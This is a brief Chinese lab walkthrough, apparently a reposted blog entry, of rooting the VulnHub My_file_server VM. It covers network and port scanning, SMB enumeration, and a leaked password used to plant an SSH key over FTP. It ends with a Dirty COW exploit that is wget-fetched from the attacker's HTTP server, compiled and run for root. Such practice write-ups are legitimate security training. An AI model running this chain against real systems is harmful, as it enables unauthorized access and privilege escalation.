今天实践的是vulnhub的My_file_server镜像,
下载地址,https://download.vulnhub.com/myfileserver/My_file_server_1.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.191,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.191,
靶机上有ftp,ssh,http服务,
还有smb服务,
扫描smb用户,smbmap -H 192.168.0.191,
获取到用户smbuser,
对http服务做漏洞扫描,nikto -h 192.168.0.191,
浏览器访问http://192.168.0.191/readme.txt,
获取到密码,rootroot1,
kali攻击机上制作ssh登录密钥,ssh-keygen,
ftp访问靶机,ftp 192.168.0.191,用smbuser/rootroot1登录,
创建隐藏文件夹,mkdir .ssh,进入文件夹,cd .ssh,
上传ssh公钥,put /home/kali/.ssh/id_rsa.pub authorized_keys,
ssh访问靶机,ssh [email protected],
查看系统版本号,uname -a,
根据经验有藏牛漏洞,还是用前面实践过的方法,
在kali攻击机上创建c文件,vim dirtycow.c,
kali攻击机上开个http下载服务,python2 -m SimpleHTTPServer,
在靶机上下载c文件,wget http://192.168.0.195:8000/dirtycow.c,
编译,gcc dirtycow.c -o root -pthread,
执行,./root,获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之My_file_server的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论